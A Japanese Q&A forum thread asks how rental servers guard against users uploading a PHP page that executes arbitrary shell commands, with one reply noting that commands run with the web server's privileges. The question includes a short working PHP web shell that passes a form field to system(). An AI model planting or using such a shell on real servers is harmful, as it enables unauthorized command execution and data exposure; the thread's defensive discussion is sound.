• 締切済み

悪意のあるユーザーについて

コーディング中、ふと気になった事があります。 コマンドインジェクションなんですが、 例えばですが、悪意があるユーザーが下記のようなソースをパーミッション777のディレクトリにアップした時、 ある程度、好きにコマンドが実行出来てしまったりしますよね。 レンタルサーバはどのように対策をしているのでしょうか? sample.php <html> <head> </head> <body> <form method="POST"> <input type="text" name="cmd" value="<?php echo is_null($_POST['cmd'])?'ls -la':$_POST['cmd'];?>" /> <input type="submit" /> </form> <hr /> <textarea cols="140" rows="10"> <?php if(!is_null($_POST['cmd']))system($_POST['cmd']);?> </textarea> </body> </html>

みんなの回答

  • windfactA
  • ベストアンサー率63% (52/82)
回答No.1

コマンドの実行はできそうですが、実行権限がapacheなどになります。 スーパーユーザ権限で実行できるわけではないので、 例えばrmでシステムファイルを削除しようとしても permission denied(権限がない)となるだけです。 >ある程度、好きにコマンドが実行出来てしまったりしますよね。 ある程度、ですね。 >レンタルサーバはどのように対策をしているのでしょうか? 触られたくないファイルのパーミッションを700にしてる、とか?

t_netbug
質問者

お礼

返信が遅くなり申し訳ありませんでした。 apache権限なのは理解してました。 でもapacheで覗ける場所はどこでも見れてしまうって事ですよね? /home/<username>/public_html内部とか…。 もう少し調べてみます。 ありがとうございました。

  1. カテゴリ
  2. [技術者向] コンピューター
  3. ITシステム運用・管理
  4. その他(ITシステム運用・管理)

関連するQ&A

注目のQ&A

カテゴリ

専門家に質問してみよう

職業から探して質問する

あなたにピッタリな商品が見つかる! OKWAVE セレクト

質問する